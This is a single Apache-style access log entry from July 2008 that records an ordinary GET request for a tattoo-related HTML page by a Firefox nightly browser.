65.214.44.28 - - [31/Jul/2008:01:19:16 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
